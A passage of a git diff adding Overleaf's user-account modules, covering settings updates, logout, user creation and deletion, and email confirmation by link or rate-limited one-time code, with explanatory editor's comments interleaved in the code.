{ + const logout = promisify(req.logout) + await logout() + } + + const destroySession = promisify(req.session.destroy.bind(req.session)) + await destroySession() + + UserSessionsManager.promises.untrackSession(user, sessionId).catch(err => { + logger.warn({ err, userId: user._id }, 'failed to untrack session') + }) + res.sendStatus(200) +} + +async function subscribe(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + req.logger.addFields({ userId }) + + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + email: 1, + first_name: 1, + last_name: 1, + }) + await NewsletterManager.promises.subscribe(user) + res.json({ + message: req.i18n.translate('thanks_settings_updated'), + }) +} + +async function unsubscribe(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + req.logger.addFields({ userId }) + + const user = await UserGetter.promises.getUser(userId, { + _id: 1, + email: 1, + first_name: 1, + last_name: 1, + }) + await NewsletterManager.promises.unsubscribe(user) + await Modules.promises.hooks.fire('newsletterUnsubscribed', user) + res.json({ + message: req.i18n.translate('thanks_settings_updated'), + }) +} + +async function updateUserSettings(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + req.logger.addFields({ userId }) + + const user = await User.findById(userId).exec() + if (user == null) { + throw new OError('problem updating user settings', { userId }) + } + + if (req.body.first_name != null) { + user.first_name = req.body.first_name.trim() + } + if (req.body.last_name != null) { + user.last_name = req.body.last_name.trim() + } + if (req.body.role != null) { + user.role = req.body.role.trim() + } + if (req.body.institution != null) { + user.institution = req.body.institution.trim() + } + if (req.body.mode != null) { + user.ace.mode = req.body.mode + } + if (req.body.editorTheme != null) { + user.ace.theme = req.body.editorTheme + } + if (req.body.overallTheme != null) { + user.ace.overallTheme = req.body.overallTheme + } + if (req.body.fontSize != null) { + user.ace.fontSize = req.body.fontSize + } + if (req.body.autoComplete != null) { + user.ace.autoComplete = req.body.autoComplete + } + if (req.body.autoPairDelimiters != null) { + user.ace.autoPairDelimiters = req.body.autoPairDelimiters + } + if 
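  // [editor's note] Payload sketch for this handler: every field below is
  // optional and copied onto `user` (or `user.ace`) only when present.
  // Field names come from the checks in this function; the endpoint path
  // is an assumption:
  //
  //   POST /user/settings
  //   {
  //     "first_name": "Ada",
  //     "mode": "vim",
  //     "editorTheme": "textmate",
  //     "fontSize": 12,
  //     "spellCheckLanguage": "en",
  //     "syntaxValidation": true
  //   }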
(req.body.spellCheckLanguage != null) { + user.ace.spellCheckLanguage = req.body.spellCheckLanguage + } + if (req.body.pdfViewer != null) { + user.ace.pdfViewer = req.body.pdfViewer + } + if (req.body.syntaxValidation != null) { + user.ace.syntaxValidation = req.body.syntaxValidation + } + if (req.body.fontFamily != null) { + user.ace.fontFamily = req.body.fontFamily + } + if (req.body.lineHeight != null) { + user.ace.lineHeight = req.body.lineHeight + } + if (req.body.mathPreview != null) { + user.ace.mathPreview = req.body.mathPreview + } + if (req.body.referencesSearchMode != null) { + const mode = + req.body.referencesSearchMode === 'simple' ? 'simple' : 'advanced' + user.ace.referencesSearchMode = mode + } + if (req.body.enableNewEditor != null) { + user.ace.enableNewEditor = Boolean(req.body.enableNewEditor) + } + await user.save() + + const newEmail = req.body.email?.trim().toLowerCase() + if ( + newEmail == null || + newEmail === user.email || + req.externalAuthenticationSystemUsed() + ) { + // end here, don't update email + SessionManager.setInSessionUser(req.session, { + first_name: user.first_name, + last_name: user.last_name, + }) + res.sendStatus(200) + } else if (newEmail.indexOf('@') === -1) { + // email invalid + res.sendStatus(400) + } else { + // update the user email + const auditLog = { + initiatorId: userId, + ipAddress: req.ip, + } + + try { + await UserUpdater.promises.changeEmailAddress(userId, newEmail, auditLog) + } catch (err) { + if (err instanceof Errors.EmailExistsError) { + const translation = req.i18n.translate('email_already_registered') + return HttpErrorHandler.conflict(req, res, translation) + } else { + return HttpErrorHandler.legacyInternal( + req, + res, + req.i18n.translate('problem_changing_email_address'), + OError.tag(err, 'problem_changing_email_address', { + userId, + newEmail, + }) + ) + } + } + + const user = await User.findById(userId).exec() + SessionManager.setInSessionUser(req.session, { + email: user.email, + first_name: user.first_name, + last_name: user.last_name, + }) + + try { + await UserHandler.promises.populateTeamInvites(user) + } catch (err) { + logger.error({ err }, 'error populateTeamInvites') + } + + res.sendStatus(200) + } +} + +async function doLogout(req) { + metrics.inc('user.logout') + const user = SessionManager.getSessionUser(req.session) + logger.debug({ user }, 'logging out') + const sessionId = req.sessionID + + if (typeof req.logout === 'function') { + // passport logout + const logout = promisify(req.logout.bind(req)) + await logout() + } + + const destroySession = promisify(req.session.destroy.bind(req.session)) + await destroySession() + + if (user != null) { + UserSessionsManager.promises.untrackSession(user, sessionId).catch(err => { + logger.warn({ err, userId: user._id }, 'failed to untrack session') + }) + } +} + +async function logout(req, res, next) { + const requestedRedirect = req.body.redirect + ? 
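  // [editor's note] getSafeRedirectPath guards against open redirects:
  // only a vetted same-site path survives, and anything rejected falls
  // through to '/login' via the `||` fallback below. Illustrative
  // expectation (the helper's exact behaviour is assumed, not shown in
  // this diff):
  //
  //   getSafeRedirectPath('/project')             // -> '/project'
  //   getSafeRedirectPath('https://evil.example') // -> undefined -> '/login'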
UrlHelper.getSafeRedirectPath(req.body.redirect) + : undefined + const redirectUrl = requestedRedirect || '/login' + + await doLogout(req) + + if (acceptsJson(req)) { + res.status(200).json({ redir: redirectUrl }) + } else { + res.redirect(redirectUrl) + } +} + +async function expireDeletedUser(req, res, next) { + const userId = req.params.userId + await UserDeleter.promises.expireDeletedUser(userId) + res.sendStatus(204) +} + +async function expireDeletedUsersAfterDuration(req, res, next) { + await UserDeleter.promises.expireDeletedUsersAfterDuration() + res.sendStatus(204) +} + +module.exports = { + clearSessions: expressify(clearSessions), + changePassword: expressify(changePassword), + tryDeleteUser: expressify(tryDeleteUser), + subscribe: expressify(subscribe), + unsubscribe: expressify(unsubscribe), + updateUserSettings: expressify(updateUserSettings), + logout: expressify(logout), + expireDeletedUser: expressify(expireDeletedUser), + expireDeletedUsersAfterDuration: expressify(expireDeletedUsersAfterDuration), + ensureAffiliationMiddleware: expressify(ensureAffiliationMiddleware), + ensureAffiliation, +} diff --git a/services/web/app/src/Features/User/UserCreator.js b/services/web/app/src/Features/User/UserCreator.js new file mode 100644 index 0000000..390d925 --- /dev/null +++ b/services/web/app/src/Features/User/UserCreator.js @@ -0,0 +1,145 @@ +const logger = require('@overleaf/logger') +const util = require('util') +const { AffiliationError } = require('../Errors/Errors') +const Features = require('../../infrastructure/Features') +const { User } = require('../../models/User') +const UserDeleter = require('./UserDeleter') +const UserGetter = require('./UserGetter') +const UserUpdater = require('./UserUpdater') +const Analytics = require('../Analytics/AnalyticsManager') +const UserOnboardingEmailManager = require('./UserOnboardingEmailManager') +const UserPostRegistrationAnalyticsManager = require('./UserPostRegistrationAnalyticsManager') +const OError = require('@overleaf/o-error') + +async function _addAffiliation(user, affiliationOptions) { + try { + await UserUpdater.promises.addAffiliationForNewUser( + user._id, + user.email, + affiliationOptions + ) + } catch (error) { + throw new AffiliationError('add affiliation failed').withCause(error) + } + + try { + user = await UserGetter.promises.getUser(user._id) + } catch (error) { + logger.error( + OError.tag(error, 'could not get fresh user data', { + userId: user._id, + email: user.email, + }) + ) + } + return user +} + +async function recordRegistrationEvent(user) { + try { + const segmentation = { + 'home-registration': 'default', + } + if (user.thirdPartyIdentifiers && user.thirdPartyIdentifiers.length > 0) { + segmentation.provider = user.thirdPartyIdentifiers[0].providerId + } + Analytics.recordEventForUserInBackground( + user._id, + 'user-registered', + segmentation + ) + } catch (err) { + logger.warn({ err }, 'there was an error recording `user-registered` event') + } +} + +async function createNewUser(attributes, options = {}) { + let user = new User() + + if (attributes.first_name == null || attributes.first_name === '') { + attributes.first_name = attributes.email.split('@')[0] + } + + Object.assign(user, attributes) + + user.ace.syntaxValidation = true + + const reversedHostname = user.email.split('@')[1].split('').reverse().join('') + + const emailData = { + email: user.email, + createdAt: new Date(), + reversedHostname, + } + if (Features.hasFeature('affiliations')) { + emailData.affiliationUnchecked = true + } + if 
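  // [editor's note] Why reversedHostname (computed above): storing the
  // domain reversed turns hostname lookups -- see getUsersByHostname later
  // in this diff -- into exact matches on an indexable field, and would
  // let a domain-suffix search become an index-friendly anchored prefix.
  // Worked example:
  //
  //   'ada@cs.example.com'.split('@')[1]  // 'cs.example.com'
  //     .split('').reverse().join('')     // 'moc.elpmaxe.sc'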
( + attributes.samlIdentifiers && + attributes.samlIdentifiers[0] && + attributes.samlIdentifiers[0].providerId + ) { + emailData.samlProviderId = attributes.samlIdentifiers[0].providerId + } + + const affiliationOptions = options.affiliationOptions || {} + + if (options.confirmedAt) { + emailData.confirmedAt = options.confirmedAt + affiliationOptions.confirmedAt = options.confirmedAt + } + user.emails = [emailData] + + user = await user.save() + + if (Features.hasFeature('affiliations')) { + try { + user = await _addAffiliation(user, affiliationOptions) + } catch (error) { + if (options.requireAffiliation) { + await UserDeleter.promises.deleteMongoUser(user._id) + throw OError.tag(error) + } else { + const err = OError.tag(error, 'adding affiliations failed') + logger.error({ err, userId: user._id }, err.message) + } + } + } + + await recordRegistrationEvent(user) + await Analytics.setUserPropertyForUser(user._id, 'created-at', new Date()) + await Analytics.setUserPropertyForUser(user._id, 'user-id', user._id) + if (attributes.analyticsId) { + await Analytics.setUserPropertyForUser( + user._id, + 'analytics-id', + attributes.analyticsId + ) + } + + if (Features.hasFeature('saas')) { + try { + await UserOnboardingEmailManager.scheduleOnboardingEmail(user) + await UserPostRegistrationAnalyticsManager.schedulePostRegistrationAnalytics( + user + ) + } catch (error) { + logger.error( + OError.tag(error, 'Failed to schedule sending of onboarding email', { + userId: user._id, + }) + ) + } + } + + return user +} + +const UserCreator = { + createNewUser: util.callbackify(createNewUser), + promises: { + createNewUser, + }, +} + +module.exports = UserCreator diff --git a/services/web/app/src/Features/User/UserDeleter.js b/services/web/app/src/Features/User/UserDeleter.js new file mode 100644 index 0000000..4009419 --- /dev/null +++ b/services/web/app/src/Features/User/UserDeleter.js @@ -0,0 +1,174 @@ +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const moment = require('moment') +const { User } = require('../../models/User') +const { DeletedUser } = require('../../models/DeletedUser') +const { UserAuditLogEntry } = require('../../models/UserAuditLogEntry') +const { Feedback } = require('../../models/Feedback') +const NewsletterManager = require('../Newsletter/NewsletterManager') +const ProjectDeleter = require('../Project/ProjectDeleter') +const SubscriptionHandler = require('../Subscription/SubscriptionHandler') +const SubscriptionUpdater = require('../Subscription/SubscriptionUpdater') +const SubscriptionLocator = require('../Subscription/SubscriptionLocator') +const UserMembershipsHandler = require('../UserMembership/UserMembershipsHandler') +const UserSessionsManager = require('./UserSessionsManager') +const UserAuditLogHandler = require('./UserAuditLogHandler') +const InstitutionsAPI = require('../Institutions/InstitutionsAPI') +const Modules = require('../../infrastructure/Modules') +const Errors = require('../Errors/Errors') +const OnboardingDataCollectionManager = require('../OnboardingDataCollection/OnboardingDataCollectionManager') +const EmailHandler = require('../Email/EmailHandler') + +module.exports = { + deleteUser: callbackify(deleteUser), + deleteMongoUser: callbackify(deleteMongoUser), + expireDeletedUser: callbackify(expireDeletedUser), + ensureCanDeleteUser: callbackify(ensureCanDeleteUser), + expireDeletedUsersAfterDuration: callbackify(expireDeletedUsersAfterDuration), + + promises: { + deleteUser, + deleteMongoUser, + expireDeletedUser, + 
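  // [editor's note] Dual-API pattern used throughout these modules: each
  // async function is exported twice, callbackified at the top level and
  // raw under `promises`. Equivalent call sketches:
  //
  //   UserDeleter.deleteUser(userId, options, err => { /* ... */ })
  //   await UserDeleter.promises.deleteUser(userId, options)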
ensureCanDeleteUser, + expireDeletedUsersAfterDuration, + }, +} + +async function deleteUser(userId, options) { + if (!userId) { + logger.warn('user_id is null when trying to delete user') + throw new Error('no user_id') + } + + try { + const user = await User.findById(userId).exec() + logger.debug({ user }, 'deleting user') + + await ensureCanDeleteUser(user) + await _cleanupUser(user) + await Modules.promises.hooks.fire('deleteUser', userId) + await UserAuditLogHandler.promises.addEntry( + userId, + 'delete-account', + options.deleterUser ? options.deleterUser._id : userId, + options.ipAddress + ) + await _createDeletedUser(user, options) + await ProjectDeleter.promises.deleteUsersProjects(user._id) + await _sendDeleteEmail(user, options.force) + await deleteMongoUser(user._id) + } catch (error) { + logger.warn({ error, userId }, 'something went wrong deleting the user') + throw error + } +} + +/** + * delete a user document only + */ +async function deleteMongoUser(userId) { + if (!userId) { + throw new Error('no user_id') + } + + await User.deleteOne({ _id: userId }).exec() +} + +async function expireDeletedUser(userId) { + await Modules.promises.hooks.fire('expireDeletedUser', userId) + const deletedUser = await DeletedUser.findOne({ + 'deleterData.deletedUserId': userId, + }).exec() + + await Feedback.deleteMany({ userId }).exec() + await OnboardingDataCollectionManager.deleteOnboardingDataCollection(userId) + + deletedUser.user = undefined + deletedUser.deleterData.deleterIpAddress = undefined + await deletedUser.save() +} + +async function expireDeletedUsersAfterDuration() { + const DURATION = 90 + const deletedUsers = await DeletedUser.find({ + 'deleterData.deletedAt': { + $lt: new Date(moment().subtract(DURATION, 'days')), + }, + user: { $type: 'object' }, + }).exec() + + if (deletedUsers.length === 0) { + return + } + + for (let i = 0; i < deletedUsers.length; i++) { + const deletedUserId = deletedUsers[i].deleterData.deletedUserId + await expireDeletedUser(deletedUserId) + await UserAuditLogEntry.deleteMany({ userId: deletedUserId }).exec() + } +} + +async function ensureCanDeleteUser(user) { + const subscription = + await SubscriptionLocator.promises.getUsersSubscription(user) + if (subscription) { + throw new Errors.SubscriptionAdminDeletionError({}) + } +} + +async function _sendDeleteEmail(user, force) { + const emailOptions = { + to: user.email, + action: 'account deleted', + actionDescribed: 'your Overleaf account was deleted', + } + try { + await EmailHandler.promises.sendEmail('securityAlert', emailOptions) + } catch (error) { + if (force) { + logger.error( + { error }, + 'error sending account deletion email notification' + ) + } else { + throw error + } + } +} + +async function _createDeletedUser(user, options) { + await DeletedUser.updateOne( + { 'deleterData.deletedUserId': user._id }, + { + user, + deleterData: { + deletedAt: new Date(), + deleterId: options.deleterUser ? options.deleterUser._id : undefined, + deleterIpAddress: options.ipAddress, + deletedUserId: user._id, + deletedUserLastLoggedIn: user.lastLoggedIn, + deletedUserSignUpDate: user.signUpDate, + deletedUserLoginCount: user.loginCount, + deletedUserReferralId: user.referal_id, + deletedUserReferredUsers: user.refered_users, + deletedUserReferredUserCount: user.refered_user_count, + deletedUserOverleafId: user.overleaf ? 
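            // [editor's note] Lifecycle sketch: deleteUser upserts this
            // DeletedUser tombstone; expireDeletedUsersAfterDuration
            // (above) later scrubs it once it is 90+ days old by matching
            //
            //   {
            //     'deleterData.deletedAt': { $lt: /* now - 90 days */ },
            //     user: { $type: 'object' }, // i.e. not yet expired
            //   }
            //
            // and unsetting `user` and `deleterData.deleterIpAddress`, so
            // personal data survives only for the grace period.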
user.overleaf.id : undefined, + }, + }, + { upsert: true } + ) +} + +async function _cleanupUser(user) { + await UserSessionsManager.promises.removeSessionsFromRedis(user) + await NewsletterManager.promises.unsubscribe(user, { delete: true }) + await SubscriptionHandler.promises.cancelSubscription(user) + await InstitutionsAPI.promises.deleteAffiliations(user._id) + await SubscriptionUpdater.promises.removeUserFromAllGroups(user._id) + await UserMembershipsHandler.promises.removeUserFromAllEntities(user._id) + await Modules.promises.hooks.fire('cleanupPersonalAccessTokens', user._id, [ + 'collabratec', + 'git_bridge', + ]) +} diff --git a/services/web/app/src/Features/User/UserEmailsConfirmationHandler.js b/services/web/app/src/Features/User/UserEmailsConfirmationHandler.js new file mode 100644 index 0000000..b349c97 --- /dev/null +++ b/services/web/app/src/Features/User/UserEmailsConfirmationHandler.js @@ -0,0 +1,139 @@ +const EmailHelper = require('../Helpers/EmailHelper') +const EmailHandler = require('../Email/EmailHandler') +const OneTimeTokenHandler = require('../Security/OneTimeTokenHandler') +const settings = require('@overleaf/settings') +const Errors = require('../Errors/Errors') +const UserUpdater = require('./UserUpdater') +const UserGetter = require('./UserGetter') +const { callbackify, promisify } = require('util') +const crypto = require('crypto') +const SessionManager = require('../Authentication/SessionManager') + +// Reject email confirmation tokens after 90 days +const TOKEN_EXPIRY_IN_S = 90 * 24 * 60 * 60 +const TOKEN_USE = 'email_confirmation' +const CONFIRMATION_CODE_EXPIRY_IN_S = 10 * 60 + +function sendConfirmationEmail(userId, email, emailTemplate, callback) { + if (arguments.length === 3) { + callback = emailTemplate + emailTemplate = 'confirmEmail' + } + + email = EmailHelper.parseEmail(email) + if (!email) { + return callback(new Error('invalid email')) + } + const data = { user_id: userId, email } + OneTimeTokenHandler.getNewToken( + TOKEN_USE, + data, + { expiresIn: TOKEN_EXPIRY_IN_S }, + function (err, token) { + if (err) { + return callback(err) + } + const emailOptions = { + to: email, + confirmEmailUrl: `${settings.siteUrl}/user/emails/confirm?token=${token}`, + sendingUser_id: userId, + } + EmailHandler.sendEmail(emailTemplate, emailOptions, callback) + } + ) +} + +async function sendConfirmationCode(email, welcomeUser) { + if (!EmailHelper.parseEmail(email)) { + throw new Error('invalid email') + } + + const confirmCode = crypto.randomInt(0, 1_000_000).toString().padStart(6, '0') + const confirmCodeExpiresTimestamp = + Date.now() + CONFIRMATION_CODE_EXPIRY_IN_S * 1000 + + await EmailHandler.promises.sendEmail('confirmCode', { + to: email, + confirmCode, + welcomeUser, + category: ['ConfirmEmail'], + }) + + return { + confirmCode, + confirmCodeExpiresTimestamp, + } +} + +async function sendReconfirmationEmail(userId, email) { + email = EmailHelper.parseEmail(email) + if (!email) { + throw new Error('invalid email') + } + + const data = { user_id: userId, email } + const token = await OneTimeTokenHandler.promises.getNewToken( + TOKEN_USE, + data, + { expiresIn: TOKEN_EXPIRY_IN_S } + ) + + const emailOptions = { + to: email, + confirmEmailUrl: `${settings.siteUrl}/user/emails/confirm?token=${token}`, + sendingUser_id: userId, + } + + await EmailHandler.promises.sendEmail('reconfirmEmail', emailOptions) +} + +async function confirmEmailFromToken(req, token) { + const { data } = await OneTimeTokenHandler.promises.peekValueFromToken( + TOKEN_USE, + token + ) + 
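  // [editor's note] For contrast with this 90-day link token, the
  // code-based flow above mints a short-lived one-time code:
  //
  //   crypto.randomInt(0, 1_000_000).toString().padStart(6, '0')
  //   // e.g. 4217 -> '004217'; uniform over '000000'..'999999', CSPRNG-backed
  //
  // which expires after CONFIRMATION_CODE_EXPIRY_IN_S (10 minutes).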
if (!data) { + throw new Errors.NotFoundError('no token found') + } + + const loggedInUserId = SessionManager.getLoggedInUserId(req.session) + // user_id may be stored as an ObjectId or string + const userId = data.user_id?.toString() + const email = data.email + if (!userId || email !== EmailHelper.parseEmail(email)) { + throw new Errors.NotFoundError('invalid data') + } + if (loggedInUserId !== userId) { + throw new Errors.ForbiddenError('logged in user does not match token user') + } + const user = await UserGetter.promises.getUser(userId, { emails: 1 }) + if (!user) { + throw new Errors.NotFoundError('user not found') + } + const emailExists = user.emails.some(emailData => emailData.email === email) + if (!emailExists) { + throw new Errors.NotFoundError('email missing for user') + } + + await OneTimeTokenHandler.promises.expireToken(TOKEN_USE, token) + await UserUpdater.promises.confirmEmail(userId, email) + + return { userId, email } +} + +const UserEmailsConfirmationHandler = { + sendConfirmationEmail, + + sendReconfirmationEmail: callbackify(sendReconfirmationEmail), + + confirmEmailFromToken: callbackify(confirmEmailFromToken), +} + +UserEmailsConfirmationHandler.promises = { + sendConfirmationEmail: promisify(sendConfirmationEmail), + confirmEmailFromToken, + sendConfirmationCode, + sendReconfirmationEmail, +} + +module.exports = UserEmailsConfirmationHandler diff --git a/services/web/app/src/Features/User/UserEmailsController.js b/services/web/app/src/Features/User/UserEmailsController.js new file mode 100644 index 0000000..54ace10 --- /dev/null +++ b/services/web/app/src/Features/User/UserEmailsController.js @@ -0,0 +1,829 @@ +const AuthenticationController = require('../Authentication/AuthenticationController') +const Settings = require('@overleaf/settings') +const logger = require('@overleaf/logger') +const SessionManager = require('../Authentication/SessionManager') +const UserGetter = require('./UserGetter') +const UserUpdater = require('./UserUpdater') +const UserSessionsManager = require('./UserSessionsManager') +const EmailHandler = require('../Email/EmailHandler') +const EmailHelper = require('../Helpers/EmailHelper') +const UserEmailsConfirmationHandler = require('./UserEmailsConfirmationHandler') +const { endorseAffiliation } = require('../Institutions/InstitutionsAPI') +const Errors = require('../Errors/Errors') +const HttpErrorHandler = require('../Errors/HttpErrorHandler') +const { expressify } = require('@overleaf/promise-utils') +const AsyncFormHelper = require('../Helpers/AsyncFormHelper') +const AnalyticsManager = require('../Analytics/AnalyticsManager') +const UserPrimaryEmailCheckHandler = require('../User/UserPrimaryEmailCheckHandler') +const UserAuditLogHandler = require('./UserAuditLogHandler') +const { RateLimiter } = require('../../infrastructure/RateLimiter') +const Features = require('../../infrastructure/Features') +const tsscmp = require('tsscmp') +const Modules = require('../../infrastructure/Modules') +const SplitTestHandler = require('../SplitTests/SplitTestHandler') + +const AUDIT_LOG_TOKEN_PREFIX_LENGTH = 10 + +const sendConfirmCodeRateLimiter = new RateLimiter('send-confirmation-code', { + points: 1, + duration: 60, +}) +const checkConfirmCodeRateLimiter = new RateLimiter( + 'check-confirmation-code-per-email', + { + points: 10, + duration: 60, + } +) +const resendConfirmCodeRateLimiter = new RateLimiter( + 'resend-confirmation-code', + { + points: 1, + duration: 60, + } +) + +async function _sendSecurityAlertEmail(user, email) { + const 
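  // [editor's note] The three RateLimiter instances above each grant
  // `points` consumptions per `duration` seconds for a given key.
  // Consumption sketch mirroring the handlers later in this file:
  //
  //   try {
  //     await sendConfirmCodeRateLimiter.consume(email, 1, { method: 'email' })
  //   } catch (err) {
  //     if (err?.remainingPoints === 0) return res.status(429).json({})
  //     throw err
  //   }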
emailOptions = { + to: user.email, + actionDescribed: `a secondary email address has been added to your account ${user.email}`, + message: [ + `<span style="display:inline-block;padding: 0 20px;width:100%;">Added: <br/><b>${email}</b></span>`, + ], + action: 'secondary email address added', + } + await EmailHandler.promises.sendEmail('securityAlert', emailOptions) +} + +/** + * This method is for adding a secondary email to be confirmed via an emailed link. + * For code confirmation, see the `addWithConfirmationCode` method in this file. + */ +async function add(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(422) + } + const user = await UserGetter.promises.getUser(userId, { + email: 1, + 'emails.email': 1, + }) + + if (user.emails.length >= Settings.emailAddressLimit) { + return res.status(422).json({ message: 'secondary email limit exceeded' }) + } + + const affiliationOptions = { + university: req.body.university, + role: req.body.role, + department: req.body.department, + } + + try { + await UserUpdater.promises.addEmailAddress( + userId, + email, + affiliationOptions, + { + initiatorId: user._id, + ipAddress: req.ip, + } + ) + } catch (error) { + return UserEmailsController._handleEmailError(error, req, res, next) + } + + await _sendSecurityAlertEmail(user, email) + + await UserEmailsConfirmationHandler.promises.sendConfirmationEmail( + userId, + email + ) + + res.sendStatus(204) +} + +async function resendConfirmation(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(422) + } + const user = await UserGetter.promises.getUserByAnyEmail(email, { _id: 1 }) + + if (!user || user._id.toString() !== userId) { + return res.sendStatus(422) + } + + await UserEmailsConfirmationHandler.promises.sendConfirmationEmail( + userId, + email + ) + res.sendStatus(200) +} + +async function sendReconfirmation(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(400) + } + const user = await UserGetter.promises.getUserByAnyEmail(email, { _id: 1 }) + + if (!user || user._id.toString() !== userId) { + return res.sendStatus(422) + } + await UserEmailsConfirmationHandler.promises.sendReconfirmationEmail( + userId, + email + ) + + res.sendStatus(204) +} + +async function sendExistingSecondaryEmailConfirmationCode(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + if (!email) { + return res.sendStatus(400) + } + const user = await UserGetter.promises.getUserByAnyEmail(email, { + _id: 1, + email, + }) + if (!user || user._id.toString() !== userId) { + return res.sendStatus(422) + } + await sendCodeAndStoreInSession(req, 'pendingExistingEmail', email) + res.sendStatus(204) +} + +/** + * This method is for adding a secondary email to be confirmed via a code. + * For email link confirmation see the `add` method in this file. 
+ */ +async function addWithConfirmationCode(req, res) { + delete req.session.pendingSecondaryEmail + + const userId = SessionManager.getLoggedInUserId(req.session) + const email = EmailHelper.parseEmail(req.body.email) + const affiliationOptions = { + university: req.body.university, + role: req.body.role, + department: req.body.department, + } + + if (!email) { + return res.sendStatus(422) + } + + const user = await UserGetter.promises.getUser(userId, { + email: 1, + 'emails.email': 1, + }) + + if (user.emails.length >= Settings.emailAddressLimit) { + return res.status(422).json({ message: 'secondary email limit exceeded' }) + } + + try { + await UserGetter.promises.ensureUniqueEmailAddress(email) + + await sendConfirmCodeRateLimiter.consume(email, 1, { + method: 'email', + }) + + await UserAuditLogHandler.promises.addEntry( + userId, + 'request-add-email-code', + userId, + req.ip, + { + newSecondaryEmail: email, + } + ) + + await sendCodeAndStoreInSession( + req, + 'pendingSecondaryEmail', + email, + affiliationOptions + ) + + return res.sendStatus(200) + } catch (err) { + if (err.name === 'EmailExistsError') { + return res.status(409).json({ + message: { + type: 'error', + text: req.i18n.translate('email_already_registered'), + }, + }) + } + + if (err?.remainingPoints === 0) { + return res.status(429).json({}) + } + + logger.err({ err }, 'failed to send confirmation code') + + delete req.session.pendingSecondaryEmail + + return res.status(500).json({ + message: { + key: 'error_performing_request', + }, + }) + } +} + +/** + * @param {import('express').Request} req + * @param {string} sessionKey + * @param {string} email + * @param affiliationOptions + * @returns {Promise<void>} + */ +async function sendCodeAndStoreInSession( + req, + sessionKey, + email, + affiliationOptions +) { + const { confirmCode, confirmCodeExpiresTimestamp } = + await UserEmailsConfirmationHandler.promises.sendConfirmationCode( + email, + false + ) + req.session[sessionKey] = { + email, + confirmCode, + confirmCodeExpiresTimestamp, + affiliationOptions, + } +} + +/** + * @param {string} sessionKey + * @param {(req: import('express').Request, user: any, email: string, affiliationOptions: any) => Promise<void>} beforeConfirmEmail + * @returns {Promise<*>} + */ +const _checkConfirmationCode = + (sessionKey, beforeConfirmEmail) => async (req, res) => { + const userId = SessionManager.getLoggedInUserId(req.session) + const code = req.body.code + const user = await UserGetter.promises.getUser(userId, { + email: 1, + 'emails.email': 1, + }) + + const sessionData = req.session[sessionKey] + + if (!sessionData) { + logger.err({}, `error checking confirmation code. 
missing ${sessionKey}`) + + return res.status(422).json({ + message: { + key: 'error_performing_request', + }, + }) + } + + const emailToCheck = sessionData.email + + try { + await checkConfirmCodeRateLimiter.consume(emailToCheck, 1, { + method: 'email', + }) + } catch (err) { + if (err?.remainingPoints === 0) { + return res.sendStatus(429) + } else { + return res.status(500).json({ + message: { + key: 'error_performing_request', + }, + }) + } + } + + if (sessionData.confirmCodeExpiresTimestamp < Date.now()) { + return res.status(403).json({ + message: { key: 'expired_confirmation_code' }, + }) + } + + if (!tsscmp(sessionData.confirmCode, code)) { + return res.status(403).json({ + message: { key: 'invalid_confirmation_code' }, + }) + } + + try { + await beforeConfirmEmail( + req, + user, + emailToCheck, + sessionData.affiliationOptions + ) + + await UserUpdater.promises.confirmEmail( + userId, + emailToCheck, + sessionData.affiliationOptions + ) + + delete req.session[sessionKey] + + AnalyticsManager.recordEventForUserInBackground( + user._id, + 'email-verified', + { + provider: 'email', + verification_type: 'token', + isPrimary: user.email === emailToCheck, + } + ) + + const redirectUrl = + AuthenticationController.getRedirectFromSession(req) || '/project' + + return res.json({ + redir: redirectUrl, + }) + } catch (error) { + if (error.name === 'EmailExistsError') { + return res.status(409).json({ + message: { + type: 'error', + text: req.i18n.translate('email_already_registered'), + }, + }) + } + + logger.err({ error }, 'failed to check confirmation code') + + return res.status(500).json({ + message: { + key: 'error_performing_request', + }, + }) + } + } + +const checkNewSecondaryEmailConfirmationCode = _checkConfirmationCode( + 'pendingSecondaryEmail', + async (req, user, email, affiliationOptions) => { + await UserAuditLogHandler.promises.addEntry( + user._id, + 'add-email-via-code', + user._id, + req.ip, + { newSecondaryEmail: email } + ) + await _sendSecurityAlertEmail(user, email) + await UserUpdater.promises.addEmailAddress( + user._id, + email, + affiliationOptions, + { + initiatorId: user._id, + ipAddress: req.ip, + } + ) + } +) + +const checkExistingEmailConfirmationCode = _checkConfirmationCode( + 'pendingExistingEmail', + async (req, user, email) => { + await UserAuditLogHandler.promises.addEntry( + user._id, + 'confirm-email-via-code', + user._id, + req.ip, + { email } + ) + } +) + +const _resendConfirmationCode = + (sessionKey, operation, auditLogEmailKey) => async (req, res) => { + const sessionData = req.session[sessionKey] + if (!sessionData) { + logger.err({}, `error resending confirmation code. 
missing ${sessionKey}`) + return res.status(422).json({ + message: { + key: 'error_performing_request', + }, + }) + } + + const email = sessionData.email + + try { + await resendConfirmCodeRateLimiter.consume(email, 1, { method: 'email' }) + } catch (err) { + if (err?.remainingPoints === 0) { + return res.status(429).json({}) + } else { + throw err + } + } + + const userId = SessionManager.getLoggedInUserId(req.session) + + try { + await UserAuditLogHandler.promises.addEntry( + userId, + operation, + userId, + req.ip, + { [auditLogEmailKey]: email } + ) + + const { confirmCode, confirmCodeExpiresTimestamp } = + await UserEmailsConfirmationHandler.promises.sendConfirmationCode( + email, + false + ) + + sessionData.confirmCode = confirmCode + sessionData.confirmCodeExpiresTimestamp = confirmCodeExpiresTimestamp + + return res.status(200).json({ message: { key: 'we_sent_new_code' } }) + } catch (err) { + logger.err({ err, userId, email }, 'failed to send confirmation code') + return res.status(500).json({ key: 'error_performing_request' }) + } + } + +const resendNewSecondaryEmailConfirmationCode = _resendConfirmationCode( + 'pendingSecondaryEmail', + 'resend-add-email-code', + 'newSecondaryEmail' +) + +const resendExistingSecondaryEmailConfirmationCode = _resendConfirmationCode( + 'pendingExistingEmail', + 'resend-confirm-email-code', + 'email' +) + +async function confirmSecondaryEmailPage(req, res) { + const userId = 